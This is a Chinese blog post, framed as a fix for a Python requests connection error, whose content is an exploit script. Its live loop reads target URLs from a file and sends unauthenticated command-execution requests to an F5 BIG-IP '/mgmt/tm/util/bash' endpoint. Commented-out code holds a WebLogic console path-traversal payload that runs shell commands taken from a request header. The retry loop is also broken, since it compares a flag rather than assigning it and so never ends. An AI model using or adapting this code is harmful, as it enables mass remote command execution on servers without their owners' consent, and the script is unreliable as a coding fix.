解决python3 requests报错urllib3.exceptions.NewConnectionError: ＜urllib3.connection.VerifiedHTTPSConnecti

原创

include12138 2022-01-10 14:36:58 ©著作权

©著作权归作者所有：来自51CTO博客作者include12138的原创作品，请联系作者获取转载授权，否则将追究法律责任

友链

通过loop循环解决

# -*- coding: UTF-8 -*-
import sys
from time import sleep

import re
import requests
#下面这三行代码是为了解决requests的一个bug，就是Connection broken: IncompleteRead
#其实真正的原因我到现在也不清楚，但是下面这三行代码确实可以解决问题
#参考https://my.oschina.net/u/1538135/blog/858467
#python3.x中的httplib变成了http.client需要修改一下
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
# if len(sys.argv) <3:
#     print('usage: python3 exp.py http(s):target-ip:target-port command')
#     sys.exit()
# baseurl = sys.argv[1]
# #去掉url最后面的/
# if baseurl[-1]=='/':
#     baseurl = baseurl[0:-1]
# #命令中包含空格的情况
# cmd = sys.argv[2]
# if len(sys.argv) > 3:
#     i = 3
#     while i < len(sys.argv):
#         cmd += ' '
#         cmd += sys.argv[i]
#         i += 1
#调试的时候使用burp代理抓包，便于发现脚本的问题
proxy = {"http": "http://127.0.0.1:8080"}
# res = baseurl + "/console/css/%252e%252e%252fconsole.portal"
#设置不跟随302重定向，不然会获取不到cookie
#response = requests.get(res, proxies=proxy,allow_redirects=False)
#忽略https证书错误的问题，第二个请求也一样
# response = requests.get(res, allow_redirects=False, verify=False)
# print('---------------------------------------raw header---------------------------------------')
# print(response.headers)
# print('---------------------------------------raw header---------------------------------------\n\n')
# cookie_raw = response.headers['Set-Cookie']
# matchObj = re.match( r'(.*); path=/.*?', cookie_raw, re.M|re.I)
# if matchObj:
#     cookie = matchObj.group(1)
#     print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++')
#     print('cookie get!\n')
#     print(cookie)
#     print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++\n\n')
# else:
#     print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
#     print('no cookie')
#     print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n')
#     sys.exit();

#获取到cookie之后，发送第二个请求，用于执行命令
#注意 useDelimiter("\\A") 这个地方的两个\，需要再次转义，不然python会把其中一个作为
#转义符处理，导致真正发送的请求中只包含一个\
# res = baseurl + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
headers = { 'Cache-Control' : 'max-age=0' ,'Authorization' : 'Basic YWRtaW46QVNhc1M=' ,'X-F5-Auth-Token' : '' ,'Upgrade-Insecure-Requests' : '1' ,'Content-Type' : 'application/json' }
#response = requests.get(res, headers=headers, proxies=proxy, allow_redirects=False)
with open("1.txt") as fp:
        cnt = 0
        for target_url in fp:
            #target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
            #core_name = POC_1(target_url)
            print(target_url)
            fuck=False
            while fuck==False:
                try:
                    response = requests.post(target_url+'/mgmt/tm/util/bash', headers=headers,json={"command":"run","utilCmdArgs":"-c id"}, allow_redirects=False, verify=False)
                    print(response.status_code)
                    fuck==True
                except Exception as e:
                    print(e)
                    sleep(0.1)

# print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')
# print(response.text)
# print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')